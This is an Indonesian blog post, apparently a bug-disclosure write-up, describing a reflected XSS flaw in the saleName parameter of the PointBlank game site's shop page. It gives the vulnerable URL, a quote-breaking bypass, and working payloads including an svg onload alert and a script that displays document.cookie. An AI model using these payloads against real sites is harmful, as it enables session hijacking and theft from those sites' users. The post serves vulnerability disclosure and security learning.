Reflected XSS On Website PointBlank

Agustus 04, 2020 Agustus 05, 2020

Assalamualikum, Saya Akan sedikit Sharing Penemuan Bug saya Pada Website PointBlank, Game FPS No 1 Di

Indonesia.

Langsung Saja Ke POC

#Reflected XSS

Setelah Menggunakan Tools Link-Crawler Saya Menemukan Parameter URL Di bawah Ini.

• https://www.pointblank.id/shop/view? idx=10004&saleType=0&saleName=

-Saya Mencoba Memasukan Value Pada Param, SaleName=

Dan Mencoba Untuk Mem Bypass Nya ">

•https://www.pointblank.id/shop/view? idx=10004&saleType=0&saleName=1234"><

Response Dari Server,

-Saya Coba lagi Untuk Memasukan Payload XSS, <svg/onload=alert(document.domain)> DAN Boom. Payload berhasil Ter eksekusi

Respon Dari Server,

-Saya Coba Mengambil Cookie Saya Sendiri. Dengan Payload "<script>alert(document.cookie);</script>"

XSS Ter Eksekusi,

Salam Hangat Troppers 2014

-Fauzan72

GT72 | BLOG